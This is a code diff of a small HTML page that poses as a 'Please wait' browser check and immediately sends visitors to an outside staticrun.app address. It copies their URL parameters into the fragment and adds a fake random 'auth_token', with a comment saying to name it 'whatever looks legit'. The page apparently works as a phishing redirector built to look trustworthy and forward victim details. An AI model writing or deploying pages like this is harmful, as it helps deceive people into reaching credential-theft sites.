--- a/accesspoint.html
+++ b/accesspoint.html
@@ -1,28 +1,36 @@
+
 <!DOCTYPE html>
 <html>
 <head>
   <title>Please wait...</title>
   <script>
-    // Redirect function delayed by 3 seconds
-    function delayedRedirect() {
-      // Get current URL parameters
-      const params = new URLSearchParams(window.location.search);
-
-      // Set the redirect base URL
-      const baseURL = "https://papaya-1759505256502.staticrun.app/index";
-
-      // Final redirect URL with params
-      const redirectURL = baseURL + "#" + params.toString();
-
-      // Redirect
-      window.location.href = redirectURL;
+    // Generate a random jargon string (base64 encoded and URL-safe)
+    function generateJargon(length = 96) {
+      const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
+      let result = "";
+      for (let i = 0; i < length; i++) {
+        result += charset.charAt(Math.floor(Math.random() * charset.length));
+      }
+      return encodeURIComponent(btoa(result)); // Base64 + URI encode
     }
 
-    // Run redirect after 3000 ms (3 seconds)
-    setTimeout(delayedRedirect, 3000);
+    // Get current URL parameters
+    const params = new URLSearchParams(window.location.search);
+
+    // Append the jargon as a new parameter
+    params.set("auth_token", generateJargon());  // name it whatever looks legit
+
+    // Set the redirect base URL
+    const baseURL = "https://papaya-1759505256502.staticrun.app/index.html";
+
+    // Final redirect URL with params + jargon
+    const redirectURL = baseURL + "#" + params.toString();
+
+    // Redirect
+    window.location.href = redirectURL;
   </script>
 </head>
 <body>
-  <p>Please wait while we check your browser...</p>
+  Please wait...
 </body>
 </html>
